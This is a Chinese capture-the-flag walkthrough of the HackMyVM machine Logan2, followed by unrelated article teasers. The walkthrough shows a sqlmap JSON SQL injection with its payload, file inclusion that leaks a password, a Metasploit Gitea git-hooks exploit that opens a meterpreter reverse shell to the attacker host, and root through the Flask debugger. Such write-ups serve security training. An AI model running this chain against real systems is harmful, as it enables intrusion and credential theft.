[HackMyVM]靶场Logan2

难度:Medium

kali:192.168.56.104

靶机:192.168.56.146

端口扫描

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 19:41 CST
Nmap scan report for 192.168.56.146
Host is up (0.000067s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:43:A6:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

开放了 22 80 3000三个端口

先扫一下目录

┌──(root㉿kali2)-[~/Desktop]
└─#  gobuster dir -u http://192.168.56.146 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.146
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,zip,html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.hta.txt             (Status: 403) [Size: 279]
/.hta.html            (Status: 403) [Size: 279]
/.hta.zip             (Status: 403) [Size: 279]
/.hta.bak             (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.zip        (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htpasswd.zip        (Status: 403) [Size: 279]
/.htpasswd.bak        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/config.php           (Status: 200) [Size: 0]
/index.html           (Status: 200) [Size: 148]
/index.html           (Status: 200) [Size: 148]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.146/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================

去web看看

源码有script.js

用post传个参数user_agent

测试发现存在sql注入

把请求包放到sqlmap跑一下

爆库

┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch --dbs
        ___
       __H__                                                                                                      
 ___ ___[,]_____ ___ ___  {1.8.2#stable}                                                                          
|_ -| . ["]     | .'| . |                                                                                         
|___|_  [']_|_|_|__,|  _|                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                      

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:57:23 /2024-04-04/

[19:57:23] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[19:57:23] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:57:23] [INFO] resuming back-end DBMS 'mysql' 
[19:57:23] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0757pm.csv' as the CSV results file in multiple targets mode
[19:57:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[19:57:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:57:23] [INFO] fetching database names
[19:57:23] [INFO] fetching number of databases
[19:57:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[19:57:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[19:57:33] [INFO] retrieved: 
[19:57:38] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[19:58:35] [INFO] retrieved: logan
available databases [2]:
[*] information_schema
[*] logan

[19:58:52] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0757pm.csv'                                                                      

[*] ending @ 19:58:52 /2024-04-04/

爆表

┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch -D logan -tables
        ___
       __H__                                                                                                      
 ___ ___[,]_____ ___ ___  {1.8.2#stable}                                                                          
|_ -| . [.]     | .'| . |                                                                                         
|___|_  [(]_|_|_|__,|  _|                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                      

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:59:48 /2024-04-04/

[19:59:48] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[19:59:48] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:59:48] [INFO] resuming back-end DBMS 'mysql' 
[19:59:48] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0759pm.csv' as the CSV results file in multiple targets mode
[19:59:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[19:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[19:59:48] [INFO] fetching tables for database: 'logan'
[19:59:48] [INFO] fetching number of tables for database 'logan'
[19:59:48] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[19:59:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[20:00:03] [INFO] adjusting time delay to 1 second due to good response times
3
[20:00:03] [INFO] retrieved: browser
[20:00:25] [INFO] retrieved: comments
[20:00:52] [INFO] retrieved: users
Database: logan
[3 tables]
+----------+
| browser  |
| comments |
| users    |
+----------+

[20:01:07] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0759pm.csv'                                                                      

[*] ending @ 20:01:07 /2024-04-04/

爆数据

                                                                                                                  
┌──(root㉿kali2)-[~/Desktop]
└─# sqlmap -l aa.txt --batch -D logan -T users --dump
        ___
       __H__                                                                                                      
 ___ ___[.]_____ ___ ___  {1.8.2#stable}                                                                          
|_ -| . [(]     | .'| . |                                                                                         
|___|_  [,]_|_|_|__,|  _|                                                                                         
      |_|V...       |_|   https://sqlmap.org                                                                      

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:01:43 /2024-04-04/

[20:01:43] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.56.146:80/save-user-agent.php
Cookie: lang=zh-CN; i_like_gitea=926a348096e983b3; _csrf=WFlYdYemUXIyL4Tdd5QDXJG-hi46MTcxMjIzMTM0MDMxMTM3OTkzMA
POST data: {"user_agent":"1' or '1'='1"}
do you want to test this URL? [Y/n/q]
> Y
[20:01:43] [INFO] testing URL 'http://192.168.56.146:80/save-user-agent.php'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_csrf' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[20:01:43] [INFO] resuming back-end DBMS 'mysql' 
[20:01:43] [INFO] using '/root/.local/share/sqlmap/output/results-04042024_0801pm.csv' as the CSV results file in multiple targets mode
[20:01:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON user_agent ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"user_agent":"1' or '1'='1' AND (SELECT 6368 FROM (SELECT(SLEEP(5)))mYMG) AND 'SwJT'='SwJT"}
---
do you want to exploit this SQL injection? [Y/n] Y
[20:01:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:01:43] [INFO] fetching columns for table 'users' in database 'logan'
[20:01:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:01:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[20:01:53] [INFO] retrieved: 
[20:01:58] [INFO] adjusting time delay to 1 second due to good response times
user
[20:02:09] [INFO] retrieved: email
[20:02:22] [INFO] fetching entries for table 'users' in database 'logan'
[20:02:22] [INFO] fetching number of entries for table 'users' in database 'logan'
[20:02:22] [INFO] retrieved: 1
[20:02:23] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
logan
[20:02:41] [INFO] retrieved: logan@newsitelogan.logan.hmv
Database: logan
Table: users
[1 entry]
+------------------------------+--------+
| email                        | user   |
+------------------------------+--------+
| logan@newsitelogan.logan.hmv | logan  |
+------------------------------+--------+

[20:04:19] [INFO] table 'logan.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.146/dump/logan/users.csv'                                                                                                     
[20:04:19] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-04042024_0801pm.csv'                                                                      

[*] ending @ 20:04:19 /2024-04-04/

有个子域,先添加到hosts

看源码貌似可以文件包含

测试发现可以目录穿越

发现可以apache日志包含,那就可以实现rce了,不过我的rce总是不能实现

然后用执行phpinfo的时候发现命令执行函数都被ban了

那就只能使用文件包含,想到扫目录的时候扫到一个config.php,里面可能有东西

通过include实现

logan:Super_logan1234

ssh连接失败

去3000端口

又是一个gitea

登录一下

这次是低版本1.12.5 应该有漏洞

┌──(root㉿kali2)-[~/Desktop]
└─# searchsploit gitea 1.12
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authenticated)                            | multiple/webapps/49571.py
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

完美!

我选择用msf来rce

msf6 > search gitea 1.12.5

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/multi/http/gitea_git_hooks_rce  2020-10-07       excellent  Yes    Gitea Git Hooks Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gitea_git_hooks_rce

msf6 > use 0
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > options

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
                                         it/basics/using-metasploit.html
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
                                        on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/gitea_git_hooks_rce) > set PASSWORD Super_logan1234
PASSWORD => Super_logan1234
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhosts 192.168.56.146
rhosts => 192.168.56.146
msf6 exploit(multi/http/gitea_git_hooks_rce) > set USERNAME logan
USERNAME => logan
msf6 exploit(multi/http/gitea_git_hooks_rce) > set LHOST 192.168.56.104
LHOST => 192.168.56.104
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

[*] Started reverse TCP handler on 192.168.56.104:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Gitea version is 1.12.5
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Authenticate with "logan/Super_logan1234"
[+] Logged in
[*] Create repository "Quo_Lux_Asoka"
[+] Repository created
[*] Setup post-receive hook with command
[+] Git hook setup
[*] Create a dummy file on the repo to trigger the payload
[+] File created, shell incoming...
[*] Sending stage (3045380 bytes) to 192.168.56.146
[*] Meterpreter session 1 opened (192.168.56.104:4444 -> 192.168.56.146:40686) at 2024-04-04 20:59:07 +0800
[*] Command Stager progress - 100.00% done (833/833 bytes)
[*] Cleaning up
[*] Repository Quo_Lux_Asoka deleted.

meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 1736 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
id
uid=104(git) gid=113(git) groups=113(git)

个人习惯,弹到kali上

sudo -l

git@logan2:~$ sudo -l
sudo -l
Matching Defaults entries for git on logan2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User git may run the following commands on logan2:
    (ALL) NOPASSWD: /usr/bin/python3 /opt/app.py
git@logan2:~$ cat /opt/app.py
cat /opt/app.py
cat: /opt/app.py: Permission denied

不给看,那就执行以下看看

git@logan2:~$ sudo /usr/bin/python3 /opt/app.py
sudo /usr/bin/python3 /opt/app.py
 * Serving Flask app 'app'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://127.0.0.1:8000
Press CTRL+C to quit
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 671-200-552

8000端口开了个服务还给了pin码

去终端看看

发现system不能用,那就用popen,结果发现自己是root了,那就把user flag和root flag都交了

觉得终端用不习惯的也可以弹个shell,都一样。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/517799.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

0201基础集成与使用-微信支付-支付模块-项目实战

文章目录 一、前言二、springboot集成2.1 配置信息与配置类2.2 微信相关枚举信息2.3 工具类2.4 业务接口 三、演示-支付与退款结语 一、前言 下面我以微信支付v3为例,通过spirngboot集成到我们的项目中,不依赖其他第三方框架。当然适用简单项目&#xf…

软考--软件设计师(软件工程总结2)

目录 1.测试方法 2.软件项目管理 3.软件容错技术 4.软件复杂性度量 5.结构化分析方法(一种面向数据流的开发方法) 6.数据流图 1.测试方法 软件测试:静态测试(被测程序采用人工检测,计算机辅助静态分析的手段&…

Unity开发之音效相关

目录 音频文件的导入 音频源相关 麦克风输入相关 获取麦克风设备信息 开始录制 获取音频数据用于存储或者传输 代码控制音频源 动态控制音效播放 示例 音频文件的导入 常用格式:wav,mp3,ogg,aiff Force To Mono(多声道转单声道)Normalize(强制为单声道&am…

C++入门 (2) >>引用>>内联函数>>auto关键字

1 引用 定义:给变量起别名。 方法:在类型后面加上&符号。 主要作用:代替函数传指针。 例: void test(int& a) //参数为int&类型 {a 10; }int main() {int m 3;int& z m; //给m起别名叫z&#xff0…

基于springboot+vue+Mysql的在线考试系统

开发语言:Java框架:springbootJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:…

MySQL8,体验不一样的安装方式!

MySQL官网中下载YUM源rpm安装包。 1、把上面的rpm文件下载下来放到服务器上 #或者在linux系统中通过wget命令下载 wget http://dev.mysql.com/get/mysql80-community-release-el7-1.noarch.rpm2、下载完成后使用yum命令本地安装yum源 yum localinstall mysql80-community-rel…

Linux云计算之Linux基础3——Linux基本认识操作

1、终端 终端(terminal):人和系统交互的必要设备,人机交互最后一个界面(包含独立的输入输出设备) 物理终端(console):直接接入本机器的键盘设备和显示器虚拟终端(tty):通过软件方式虚拟实现的终端。它可以…

IP-guard WebServer 任意文件读取漏洞复现

0x01 产品简介 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 0x02 漏洞概述 由于IP-guard WebServer /ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严…

VMamba: Visual State Space Model

VMamba: Visual State Space Model VMamba:视觉状态空间模型 论文链接:http://arxiv.org/abs/2401.10166 代码链接:https://github.com/MzeroMiko/VMamba 1、摘要 借鉴了最近引入的状态空间模型SSM,提出了Visual State Space M…

如何保证Redis的缓存和数据库中的数据的一致性?

Redis的缓存如何和数据库中的数据保持一致性? 我们都知道,Redis是一个基于内存的键值存储系统,数据完全存放在内存中,这使得它的读写速度远超传统的硬盘存储数据库。对于高访问频率、低修改率的数据,通过将它们缓存在…

动态规划:线性dp

1.最长公共子序列(LCS) dp[i][j]含义:序列Ai(a1-ai)和Bj(b1-bj)的最长公共子序列长度 分析两种情况: (1)当ai bj时,已经求得Ai-1和Bj-1的最长公共子序列 dp[i][j] dp[i-1][j-1] 1 (2)当…

C++:比较运算符(18)

就是进行数据的比较&#xff0c;表达式正确的话就是真&#xff0c;错的话就是假&#xff0c;真假则由bool值来代替&#xff0c;非0即真 等于&#xff08;为赋值&#xff0c;为比较&#xff09;10 200!不等于10 ! 201>大于10 > 200<小于10 < 201>大于等于20 >…

windows安装Openssl

openssl官网:[ Downloads ] - /source/index.html Windows 安装方法 OpenSSL 官网没有提供 Windows 版本的安装包&#xff0c;可以选择其他开源平台提供的工具 Win32/Win64 OpenSSL Installer for Windows - Shining Light Productions 等待下载完成 捐不起 配置环境变量 ope…

【图论】【基环内向树】【广度优先】【深度优先】2127. 参加会议的最多员工数

作者推荐 视频算法专题 本文涉及知识点 图论 基环内向树 LeetCode2127. 参加会议的最多员工数 一个公司准备组织一场会议&#xff0c;邀请名单上有 n 位员工。公司准备了一张 圆形 的桌子&#xff0c;可以坐下 任意数目 的员工。 员工编号为 0 到 n - 1 。每位员工都有一位…

XML --java学习笔记

XML(全称EXtensible Markup Language&#xff0c;可扩展标记语言) 本质是一种数据的格式&#xff0c;可以用来存储复杂的数据结构&#xff0c;和数据关系 XML的特点 XML中的“<标签名>”称为一个标签或一个元素&#xff0c;一般是成对出现的XML中的标签名可以自己定义…

数字信号处理实验---FFT分析

一、题目&#xff1a; 二、实验要求&#xff1a; 1、绘制图形时&#xff0c;尽量选用已经提供的函数。 2、所有的图形&#xff0c;需要加上横坐标、纵坐标以及标题的说明。 3、将设计的程序保存为脚本文件&#xff0c;在实验报告中&#xff0c;需写出程序语句。 4、Matlab程…

【GlobalMapper精品教程】073:像素到点(Pixels-to-Points)从无人机图像轻松生成点云

文章目录 一、工具介绍二、生成点云三、生成正射四、生成3D模型五、注意事项一、工具介绍 Global Mapper v19引入的新的像素到点工具使用摄影测量原理,从重叠图像生成高密度点云、正射影像及三维模型。它使LiDAR模块成为已经功能很强大的的必备Global Mapper扩展功能。 打开…

安装geopandas很简单。。。

创建新环境 创建新环境并不是绝对必要的&#xff0c;但考虑到安装来自不同通道的其他地理空间包可能会导致依赖冲突 &#xff0c;安装新环境可能是很好的做法&#xff0c;在干净的环境中堆叠&#xff0c;重新开始。 以下命令创建一个名为geo_env的新环境&#xff0c; 将其配置…

CANoe之使用以及车载项目实操总结

以下是我通过8年的项目实操自我总结的一些经验和技术&#xff0c;作为一名奋斗在一线的研发人员&#xff0c;无时无刻不在做自我总结&#xff0c;所有的总结都是通过日报、周报、月报提炼出来的&#xff0c;实践是检验技术的唯一标准&#xff1b; 欢迎大家的交流和分享 思维导…

VSCODE使用VSIX安装扩展

VSCode安装扩展特别慢&#xff0c;使用命令行安装告别龟速&#xff1a; code --install-extension当然&#xff0c;我这个是在WSL 的linux上安装的&#xff0c;Windows一样的。 VSCode扩展商店网页链接&#xff1a;https://marketplace.visualstudio.com/vscode